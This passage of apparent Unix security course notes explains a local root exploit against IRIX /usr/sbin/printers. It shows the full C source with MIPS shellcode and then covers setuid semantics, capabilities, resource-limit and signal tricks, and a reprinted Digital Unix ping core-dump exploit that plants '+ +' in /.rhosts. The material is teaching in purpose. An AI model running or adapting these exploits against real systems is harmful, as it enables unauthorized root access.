$ ./x 123.123.123.123:0 copyright LAST STAGE OF DELIRIUM jun 2003 poland //lsd-pl.net/ libdesktopicon.so $HOME for irix 6.2 6.3 6.4 6.5 6.5.21 IP:ALL Warning: Color name "SGIVeryLightGrey" is not defined # id uid=100(aeb) gid=100(foo) euid=0(root)where 123.123.123.123:0 points at the display of my home machine. A local root exploit. I did this in good script-kiddie style, before understanding what happened. But what happens?
The binary ./x
was compiled from
/*## copyright LAST STAGE OF DELIRIUM jun 2003 poland *://lsd-pl.net/ #*/ /*## libdesktopicon.so $HOME #*/ #define NOPNUM 1300 #define ADRNUM 900 #define PCHNUM 400 char setreuidcode[]= "\x30\x0b\xff\xff" /* andi $t3,$zero,0xffff */ "\x24\x02\x04\x01" /* li $v0,1024+1 */ "\x20\x42\xff\xff" /* addi $v0,$v0,-1 */ "\x03\xff\xff\xcc" /* syscall */ "\x30\x44\xff\xff" /* andi $a0,$v0,0xffff */ "\x31\x65\xff\xff" /* andi $a1,$t3,0xffff */ "\x24\x02\x04\x64" /* li $v0,1124 */ "\x03\xff\xff\xcc" /* syscall */ ; char shellcode[]= "\x04\x10\xff\xff" /* bltzal $zero,<shellcode> */ "\x24\x02\x03\xf3" /* li $v0,1011 */ "\x23\xff\x01\x14" /* addi $ra,$ra,276 */ "\x23\xe4\xff\x08" /* addi $a0,$ra,-248 */ "\x23\xe5\xff\x10" /* addi $a1,$ra,-240 */ "\xaf\xe4\xff\x10" /* sw $a0,-240($ra) */ "\xaf\xe0\xff\x14" /* sw $zero,-236($ra) */ "\xa3\xe0\xff\x0f" /* sb $zero,-241($ra) */ "\x03\xff\xff\xcc" /* syscall */ "/bin/sh" ; char jump[]= "\x03\xa0\x10\x25" /* move $v0,$sp */ "\x03\xe0\x00\x08" /* jr $ra */ ; char nop[]="\x24\x0f\x12\x34"; main(int argc,char **argv){ char buffer[10000],adr[4],pch[4],*b,*envp[2]; int i; printf("copyright LAST STAGE OF DELIRIUM jun 2003 poland //lsd-pl.net/\n"); printf("libdesktopicon.so $HOME for irix 6.2 6.3 6.4 6.5 6.5.21 "); printf("IP:ALL\n\n"); if(argc!=2){ printf("usage: %s xserver:display\n",argv[0]); exit(-1); } *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+8580+3056+600; *((unsigned long*)pch)=(*(unsigned long(*)())jump)()+8580+400+31552; envp[0]=buffer; envp[1]=0; b=buffer; sprintf(b,"HOME="); b+=5; for(i=0;i<ADRNUM;i++) *b++=adr[i%4]; for(i=0;i<PCHNUM;i++) *b++=pch[i%4]; for(i=0;i<1+4-((strlen(argv[1])%4));i++) *b++=0xff; for(i=0;i<NOPNUM;i++) *b++=nop[i%4]; for(i=0;i<strlen(setreuidcode);i++) *b++=setreuidcode[i]; for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i]; *b=0; execle("/usr/sbin/printers","lsd","-display",argv[1],0,envp); }
It is clear that this is an exploit of /usr/sbin/printers
,
using a buffer overflow involving the HOME
environment variable.
And indeed, that program is setuid root, so we can expect profit from a
buffer overflow:
# ls -l /usr/sbin/printers -rwsr-xr-x 1 root sys 226356 Dec 7 2001 /usr/sbin/printers # uname -R 6.5 6.5.14m
About the assembler code used, some details are explained by the authors. For some more info on MIPS/IRIX, see Phrack 56#16. First of all, the code is big-endian, for use with IRIX.
The address of the shellcode is obtained using the bltzal $zero
instruction. This instruction is a Branch if Less Than Zero And Link,
that tests whether 0 is negative and jumps if it is (but it isn't),
and writes the return address of this conditional subroutine call,
that is, the address shellcode+8
, in the $ra
register.
The li
(load immediate) instruction here fills the delay slot.
It is not a dummy: the $v0
register specifies which systemcall
is done. Here 0x3f3=1011 is the execv system call.
(System call numbers can be found on an IRIX machine in /usr/include/sys.s
.)
In order to obtain the address of the /bin/sh
string, we first
add 276 and then subtract 248. This is done in this convoluted way
because directly adding 28 would involve a 16-bit operand with a zero byte,
which cannot be used in a string.
The execv system call is completed by storing the address of the /bin/sh
string, then a NULL, and finally a NUL byte terminating the /bin/sh
string.
That explains the shellcode[]
array. Concerning the
setreuidcode[]
array: 1024 is the getuid()
system call,
1124 is the setreuid()
system call. The effect is that we do
setreuid(getuid(),0)
, which sets the effective user ID back to 0 -
useful in case of a setuid executable that drops privileges but has a
saved user ID that still remembers its former powers. (See also
below.)
The peculiar invocations of jump[]
read the value of the stack pointer.
The return jump needs some instruction to fill the delay slot, and
conveniently there is that nop[]
array following.
We make an environment that consists only of the HOME=
string.
That string is filled with 900/4 copies of the address adr
,
400/4 copies of the address pch
, some padding to correct alignment,
1300/4 NOPs, and the exploit code. The addresses are not aligned in the
array buffer
, but will be aligned when returned by
getenv("HOME")
.
Remains to explain the final details of the array overflow.
In a Unix-like environment each process has a real user ID, the ID of the user that started the program, an effective user ID, the ID of the user whose powers determine what the program is allowed to do, and a saved user ID, that remembers an earlier effective user ID.
Users can belong to groups, and each process has a real group ID, possibly some supplementary group IDs, an effective group ID, and a saved group ID.
The details are a real mess, and that means that there are lots of security problems with this setup.
A Unix user has a user ID (uid), a number that encodes his identity.
The file /etc/passwd
will give the correspondence between
name and uid.
A Unix process has a (real) uid, probably inherited from its parent,
that indicates what user is running the process. The user logged in,
and the login
program gave her a shell with approprite uid,
and this uid is inherited across forks.
Traditionally, root, the user with user ID 0, is all-powerful.
Sometimes a user needs to run a program that can do more than she can do herself. She plays a game, and the program must update the highscore list. She sends mail, and the program must update the mailbox of the recipient. She changes her password, and the password file must be updated. The powers of a program are determined by its effective user ID (euid). Normally the effective user ID equals the user ID of the user that runs the program, but when the mode of the program binary has the setuid bit set, the real user ID of the executing program will be that of the user (process) that started it, but the effective user ID will be the user ID of the owner of the program binary. For example:
-rwsr-xr-x 1 root root 65008 2004-03-05 03:16 /bin/mountOrdinary people can run
/bin/mount
and perhaps do things
that require root permission. It is up to the program to find out
what it is willing to do for that user.
Setuid root processes are a security problem because they can do everything, and have to be very careful not to be tricked by the user running them. In order to make life easier for the authors of such programs, POSIX introduced the saved effective user ID. A process can drop its privileges by setting its effective user ID to its real user ID, while the saved effective user ID remembers the previous value. Later, when it needs this power again, the process can set its effective user ID again to its saved effective user ID. Now large parts of the program code will run without any special powers and the risk of being tricked is decreased.
The saved effective user ID is set to the effective user ID directly after each exec.
(Note: "setuid" is often abbreviated "suid", but also "saved effective user ID" is abbreviated so.)
In order to make it easier for an NFS server to serve files
to many different users, Linux introduced the filesystem user ID.
Usually equal to the effective user ID, but the NFS server that runs
with effective user ID 0 (for root) can set its fsuid to that of the user
who asks for a file. See setfsuid(2)
.
An all-powerful user root leads to problems. People have tried to
split the root power into many different capabilities. See
capset(2)
. The capability system is not used very much.
Often it turns out that if one gives someone part of roots power,
this can be used to obtain full root power.
But the capability system exists, and while it was meant to allow
to set up a more secure system, so far it has mostly resulted in
more insecurity.
The problem is that not many programmers know about capabilities. The details are badly documented. And a hacker can abuse the capability system and start a setuid root program in such a way that it lacks some capabilities. Now some of its actions will unexpectedly fail. For example, it may be that its attempt to drop privileges will fail. (Sendmail local root exploit, June 2000, Linux 2.2.15, fixed in 2.2.16.)
These details are for recent Linux systems. Note that details have changed a lot over time, and also are a bit different on other Unix-type systems like *BSD, Solaris, etc.
There are of course many more details. Read the source.
(There are 16-bit and 32-bit versions of these calls, and
conversions. Calls like setuid()
may fail when
the maximum number of processes for the target user has been
reached. Etc.)
The values of ruid, euid, suid, fsuid, CAP_SETUID are inherited across forks.
If the filesystem was mounted NOSUID, the values of ruid, euid, suid, fsuid
are not changed upon an exec()
. Otherwise, the value of ruid
is preserved, the values of euid and fsuid are preserved when the file
executed did not have the setuid bit set, and are set to the owner ID
of the file when the setuid bit was set, and finally suid is set to euid.
The MS_NOSUID flag specified for a mount determines whether
setuid and setgid bits are honoured with an execve()
.
If the invoker has CAP_SETUID then the call setuid(u)
sets all of ruid, euid, fsuid, suid to u
.
Otherwise this call fails if u
is not one of ruid, suid,
and otherwise sets euid and fsuid to u
.
The call seteuid(e)
sets euid to e
. If will fail unless
the invoker has CAP_SETUID or e
is one of ruid, euid, suid.
The call setreuid(r,e)
sets ruid, euid to r,e
,
respectively, or leaves them unchanged when the corresponding parameter is -1.
This call will fail unless the process has the CAP_SETUID capability
or r
is one of -1, ruid, euid
and e
is one of -1, ruid, euid, suid.
If r
was not -1 or e
was not -1 and not the old ruid,
then suid is set to the new euid.
Finally fsuid is made equal to the new euid
The call setresuid(r,e,s)
sets ruid, euid, suid to r,e,s
,
respectively, or leaves them unchanged when the corresponding parameter is -1.
This call will fail unless the process has the CAP_SETUID capability
or each of r,e,s
are equal to one of -1, ruid, euid, suid.
There is a set of possible permissions (for a list,
see capabilities(7)
), and subsets of it are
indicated by bitmasks. There is cap_effective
, the set
of presently enabled capabilities, and cap_permitted
,
the set of capabilities that this process can enable, and
cap_inheritable
, the maximum set of capabilities that
a child may have. Normally, an ordinary process has none of these
capabilities, and root has all of them. System calls are
capget(2)
and capset(2)
.
If a process changes from being root (in the weak sense
that at least one of ruid, euid, suid is zero) to being non-root
(ruid, euid, suid all nonzero), then by default all capabilities
are dropped. However, each process has a "keep capabilities" flag,
and if that is set capabilities are not dropped upon becoming non-root.
The call prctl(PR_SET_KEEPCAPS,b);
(where b
is either 0 or 1), sets this "keep capabilities" flag
to b
.
This is the capability checked by the system calls setuid()
,
setreuid()
, setresuid()
, and setfsuid()
.
This capability allows a process to change user IDs arbitrarily.
There is also a corresponding CAP_SETGID.
One can run a setuid binary in a modified environment, presenting conditions it was not programmed to handle.
Most programs expect file descriptors 0, 1, 2 (stdin, stdout, stderr) to be suitable for reading, writing, and writing error messages. But if the invoker of a setuid binary closes for example file descriptor 2 before the exec, then the first file opened by this binary will get file descriptor 2, and a later error message is written to this file.
Most programs expect argv[0]
to contain the name that was used
to invoke them. But the invoker can make argv[0]
an arbitrary string.
(This is also used legitimately - for example, for the shell a leading '-'
in argv[0]
used to be an indicator that this shell was a login shell.)
But if a naive program, like sendmail, re-execs itself doing
execv(argv[0],argv);
, then we have a local root exploit. (1996)
Create some very large files so that the disk is full or very nearly full. Not many programs handle the disk full situation well. Output files may be truncated. Programs may crash.
(Filling up a disk can also be a way to make sure what you do afterwards
will not be logged by syslog
.)
It may be possible to cause a remote disk full condition. A good compressor will compress a very large constant file (say 20 GB of NULs) to something rather small. Send it as attachment in a letter. Watch the anti-virus software of the receiver unpack it.. Some anti-virus software now detects precisely this: a very large file of NULs. But then a very large and very compressible file with something else works.
Similarly, not many programs expect a stack overflow.
But ulimit -s 100; foo
starts the program foo
in an environment with very small stack. Probably it will segfault.
Let us try.
% ulimit -s 100; mount /zip % umount /zip % ulimit -s 10; mount /zip Segmentation faultSometimes it is possible to exploit the messy half-finished situation that is left behind when a program segfaults halfway.
There are other resource limits one can play with. Read bash(1), ulimit(3), getrlimit(2), setrlimit(2), sysconf(3).
One cannot send signals from unprivileged to privileged processes.
(Indeed, the standard says: For a process to have permission to send a signal to a process designated by pid, unless the sending process has appropriate privileges, the real or effective user ID of the sending process shall match the real or saved set-user-ID of the receiving process.)
But an unprivileged process can set up an alarm signal to be sent after a prespecified time, and then fork off the setuid binary. Maybe it is killed in the middle of what it was doing, leaving an exploitable messy situation.
Often, core dump files have a predictable name. Sometimes just core
.
If one plans to make a setuid program dump core it may be useful to
have a link or symlink named core
in the directory where
core will be dumped. Sometimes one can overwrite an arbitrary file
in this way.
For example, the following exploit for Digital Unix 4.0 was found by rusty@mad.it and soren@atlink.it.
$ ls -l /.rhosts /.rhosts not found $ ls -l /usr/sbin/ping -rwsr-xr-x 1 root bin 32768 Nov 16 1996 /usr/sbin/ping $ ln -s /.rhosts core $ IMP=' >+ + >' $ ping somehost & [1] 1337 $ ping somehost & [2] 31337 $ kill -11 31337 $ kill -11 1337 [1] Segmentation fault /usr/sbin/ping somehost (core dumped) [2] +Segmentation fault /usr/sbin/ping somehost (core dumped) $ ls -l /.rhosts -rw------- 1 root system 385024 Mar 29 05:17 /.rhosts $ rlogin localhost -l rootThat is, here
core
is made a symlink to /.rhosts
,
and by defining a suitable environment variable we make sure that
a core file will contain a given string, here one that gives universal
entrance permission, then kill the setuid binary with a signal
causing a core dump.
There have been many exploits in this direction. A secure system must not allow core dumps of setuid binaries or binaries that were executable only (perhaps they have embedded passwords that should not become readable), or core dumps to a symlink.
The current Linux kernel has for each process a flag dumpable
.
One can test (and change) its value from user space using the
prctl()
system call.
Exercise
Under precisely what conditions will dumpable
be set under the 2.6.0 kernel?